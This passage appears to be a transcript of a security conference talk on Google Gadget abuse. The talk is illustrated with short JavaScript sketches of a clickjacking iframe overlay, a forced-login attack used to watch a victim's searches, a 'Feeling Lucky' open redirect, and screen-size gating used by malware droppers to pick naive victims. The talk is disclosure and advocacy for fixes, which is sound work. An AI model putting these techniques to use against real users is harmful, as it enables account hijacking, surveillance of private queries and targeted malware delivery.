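  // Shift the iframe so that (buttonX, buttonY) inside it lands at the
  // current mouse position.
  return { left: mouseX - buttonX, top: mouseY - buttonY };
}

// In the browser, a mousemove handler would apply this continuously:
//   document.addEventListener('mousemove', (e) => {
//     const pos = overlayPosition(e.pageX, e.pageY, 150, 40);
//     frame.style.left = pos.left + 'px';
//     frame.style.top = pos.top + 'px';
//   });
// A click then passes through the (semi-)transparent iframe stack to the
// real Google "add gadget" button, not the attacker's page.

const pos = overlayPosition(500, 300, 150, 40);
// pos → { left: 350, top: 260 }
```

The semi-transparency in the demo was purely for the audience; a real attacker would set the iframe fully transparent.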
But you can do it, so you can force somebody to log in as yourself if you really felt like it, which really doesn't seem like a practical attack for the most part. But it turns out it's fairly useful. And a side note: it doesn't really matter if they fix this vulnerability and stop that, because since I own this, I can do form submission, and unless they add a nonce or something that I don't have control over, it's kind of pointless to fix that. I didn't find that vulnerability. Stanford found it a couple of months ago, and it's still open. So you can see that this image didn't render, because it's not an image. And now Teddy's gonna type in something that's very, very scary to her. She's got a little problem, she itches a lot. But she's feeling lucky today. So she clicks the Feeling Lucky button, and she sees the content that she's interested in. Now I'm back in the vulnerability master account and I hit refresh. And indeed, here's her search string, because she's not in her account anymore. She's in my account. So I can subversively watch her type queries in. So that whole separation of all those things is totally dependent on whether I control your browser session. And if I've got a Google gadget there that allows me to do whatever I want, it's just up to my imagination how bad I wanna be. So these are very simple examples. I mean, how long do you think this took me to build? You were there. Two minutes? Two minutes. That's not like a long time. I didn't spend a lot of time on this demo, maybe on arranging it and making it look nice. Yeah, but not building it. This is not a difficult hack. You guys can do this stuff. And if you can do it, that's pretty scary. We need to fix that, right? So anyway, that was sort of the point. So yes, this is a problem. It's just not being widely exploited yet. So the real question is, is this expected behavior? Right?
Are we okay with that as a community? Are we okay that a gadget has complete control over our desktop? You know, a lot of consumers are gonna say yes, as long as it's not bad. And that's the real trick, isn't it? We gotta figure out some way to have a container and stop all that stuff from happening. And we don't have that yet. So the real point is, it's bad. It may not be a true vulnerability, in the sense that having a gadget isn't a vulnerability, but it's bad. So if I were a product manager in the Googleplex, and some guy were to come up to me and say, hey, by the way, you can phish users, you can do internet port scanning, you can do redirection, all this stuff. You know, I'm a product manager. I'm gonna say, you know what? Maybe we should go rethink the security model a little bit. So whether it's actually a vulnerability or not, it's bad. And that badness means that we should be talking about it as a community. I got a lot of flak for this, from Matasano. And actually, I think we kind of came to a conclusion with that. But I think it was mostly miscommunication on my part. I didn't tell them the history. There's a lot of stuff going on here. But I don't blame anyone for not understanding why it's a problem. But I think we should start talking about it in the wider security context of the browser, rather than this microcosm of one small widget. I mean, it's not the widget that I'm worried about. It's everything else. It's people's accounts. It's how the browser reacts to that widget if it's under my control. So redirection ultimately abuses that trust relationship. It all comes back to the original redirection problem that I was hounding them about four years ago. We still haven't found a way to stop that. And unfortunately, JavaScript is still out there. I was told that Google did fix the Feeling Lucky function so it's no longer exploitable. So I typed RSnake into Feeling Lucky, I hit enter, and it took me to ha.ckers.org.
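For context, Feeling Lucky at the time was just a parameter (btnI) tacked onto the normal search URL, which is why redirecting someone to whatever ranks first for a term was one GET request away. Google's handling of that parameter has changed over the years, so treat this as a sketch of the historical behavior.

```javascript
// Sketch of the open-redirect abuse: append the "I'm Feeling Lucky"
// parameter to an ordinary search URL, and the response redirects to
// the top-ranked result for the query.
function feelingLuckyUrl(query) {
  const params = new URLSearchParams({ q: query, btnI: '1' });
  return 'https://www.google.com/search?' + params.toString();
}

const url = feelingLuckyUrl('rsnake');
// url → 'https://www.google.com/search?q=rsnake&btnI=1'
```

So anyone who controls, or can poison, the first result for a term controls where that URL sends the victim.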
Does anyone think that I can't put malware on ha.ckers.org? It's exploitable. Maybe they can shut it off after the fact, but that's the sort of reactive security that we've proven time and time and time again just doesn't work, unless you're okay with a couple people getting compromised. And I personally don't really like when people get compromised. I mean, my mom is one of those people, and I want to keep her from getting compromised. And she tends to click on a lot of stupid stuff. By the way, somebody at another conference asked me, what do you tell your mom? I just say, mom, you're already compromised. And she's like, oh no, am I? Yes. And now she won't shop online anymore. So that's perfect. So that's kind of the end of the speech. I don't know if you guys had any questions. Yes. So there's an interesting question: is there JavaScript that actually does detection and tries to react based on who in particular is looking at it? And yeah, actually one of the most interesting things out there is that there's a way to do browser sniffing to tell how wide and tall a screen is. And some of the malware guys have decided that's actually a really good way to tell if someone's computer savvy, and in that case, they won't deliver the malware. So if you have a really wide, really tall screen, you're probably computer savvy, so they won't give you the malware. If you've got a little 640 by 480 screen, you're probably someone they can exploit, because you've got an old computer and you probably don't know anything. Yes. I don't know that there is a way to stop them from doing it. I mean, if you're sitting here listening to me, you know that's not a good idea. I don't have any control over Facebook or MySpace or whoever else. All we can do is keep informing them of the problem. Yeah, there's a lot of background noise.
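The screen-size heuristic from that answer is trivial to sketch. The 800 by 600 cutoff below is a made-up threshold; real droppers pick their own.

```javascript
// Sketch of screen-size gating: malware droppers reportedly skip visitors
// with large displays on the theory that they're savvier users. The
// threshold is a hypothetical example.
function shouldDeliverPayload(screenWidth, screenHeight) {
  const SAVVY_WIDTH = 800;
  const SAVVY_HEIGHT = 600;
  // Small, old display → likely an old machine and an exploitable user.
  return screenWidth <= SAVVY_WIDTH && screenHeight <= SAVVY_HEIGHT;
}

// In the browser this would be called as:
//   shouldDeliverPayload(screen.width, screen.height)
shouldDeliverPayload(640, 480);   // → true
shouldDeliverPayload(1920, 1080); // → false
```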
So just come on up and ask us questions after the talk. Thank you everybody. Thanks.